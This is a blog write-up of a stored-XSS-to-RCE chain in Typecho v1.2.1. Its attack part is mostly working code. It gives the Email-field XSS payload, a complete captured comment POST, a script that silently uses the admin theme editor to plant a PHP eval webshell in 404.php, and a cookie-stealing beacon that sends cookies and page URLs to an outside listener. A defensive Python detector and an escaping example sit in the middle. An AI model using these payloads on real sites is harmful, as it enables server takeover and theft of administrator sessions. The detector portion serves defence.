Typecho v1.2.1 RCE
source link: https://5ime.cn/typecho-xss2rce.html
Like the PHPStudy RCE from a while back, this is a 1-click: RCE achieved through a stored XSS.
Today I noticed a new issue on the Typecho GitHub repository: There's still an XSS vulnerability in v1.2.1-rc.
The vulnerability exists because the fix for the Typecho 1.2.0 XSS was incomplete. The payload given in the issue is shown below (the injection point is the Email field, whereas in 1.2.0 it was the URL field):

```text
"></a><script>alert('hacked')</script>"@example.com
```

Capture the request and send it directly:
```http
POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
```

The same injection point with a payload that loads an external script:

```text
"></a><script/src=http://url/1.js></script>"@example.com
```

The contents of the JS file are as follows; the script comes from https://github.com/typecho/typecho/issues/1545. It works by creating a hidden iframe that drives Typecho's built-in "Edit current theme" feature to perform the file write:
```javascript
function step1() {
    // Append a hidden iframe that opens the theme editor on 404.php of the default theme.
    var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
    var oldata = document.body.innerHTML;
    document.body.innerHTML = oldata + data2;
}
var times = 0;
var g_shell = 0;
function poc() {
    // Runs on every load of the iframe (saving reloads the editor), at most 10 times.
    if (times <= 10) {
        var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
        var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
        var olddatas = htmldata.innerText;
        // Prepend the one-liner to the editor content and click the save button.
        htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
        btn[1].click();
        times += 1;
        // g_shell is never set to 1 in this script, so the request below never fires.
        if (g_shell == 1) {
            var xhr1 = new XMLHttpRequest();
            xhr1.open("get", "/usr/themes/default/404.php?shell=1");
            xhr1.send();
        } else {
            return 0;
        }
    }
}
step1();
```
Visiting the file shows that the one-line webshell has been written into 404.php.
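As an added detection and mitigation example (not from the write-up or from the Typecho project): a Python helper that flags comment POST bodies whose `mail` field uses a quoted local part carrying markup, as in the request captured above, plus a hypothetical `render_author_link` showing that HTML-escaping the value on output neutralises the payload regardless of what the e-mail validator accepts. The endpoint path and field names follow the captured request; the sample bodies are constructed.

```python
import html
import re
from urllib.parse import parse_qs

# RFC 5321 quoted local part: "..."@domain. This is legal e-mail syntax, so a
# format check alone passes it; the value still has to be HTML-escaped on output.
QUOTED_LOCAL = re.compile(r'^"(?P<local>[^"]*)"@[^@\s]+$')
MARKUP = re.compile(r'[<>]|javascript:|on\w+\s*=', re.IGNORECASE)

def classify_mail(mail):
    """'suspicious' if a quoted local part carries HTML-like content,
    'quoted' for a harmless quoted local part, 'plain' otherwise."""
    m = QUOTED_LOCAL.match(mail)
    if not m:
        return 'plain'
    return 'suspicious' if MARKUP.search(m.group('local')) else 'quoted'

def inspect_comment_post(path, body):
    """Parse a form-encoded body sent to Typecho's comment endpoint and
    return the verdict for its 'mail' field (other paths are ignored)."""
    if not path.rstrip('/').endswith('/comment'):
        return {'verdict': 'ignored', 'mail': None}
    fields = parse_qs(body, keep_blank_values=True)
    mail = fields.get('mail', [''])[0]
    return {'verdict': classify_mail(mail), 'mail': mail}

def render_author_link(mail):
    """Hypothetical safe rendering of the commenter's address: escaping it for
    both the attribute and the text means quotes and angle brackets can no
    longer close the <a> tag, whatever the validator accepted."""
    return '<a href="mailto:%s">%s</a>' % (html.escape(mail, quote=True),
                                           html.escape(mail))

# Constructed samples: the body from the captured request (token omitted),
# a plain address, and a benign quoted local part.
SAMPLES = [
    ('/index.php/archives/1/comment',
     'author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert(\'hacked\')</script>"'
     '@example.com&url=&text=%E6%B5%8B%E8%AF%95'),
    ('/index.php/archives/1/comment', 'author=bob&mail=bob%40example.com&url=&text=hi'),
    ('/index.php/archives/1/comment', 'author=ann&mail=%22ann%20lee%22%40example.com&text=hi'),
]

if __name__ == '__main__':
    for path, body in SAMPLES:
        r = inspect_comment_post(path, body)
        print(r['verdict'], r['mail'])
```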
Cookie-grabbing script:

```javascript
// Beacons the page location, top/opener locations and document.cookie to the listener at `website`.
var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
```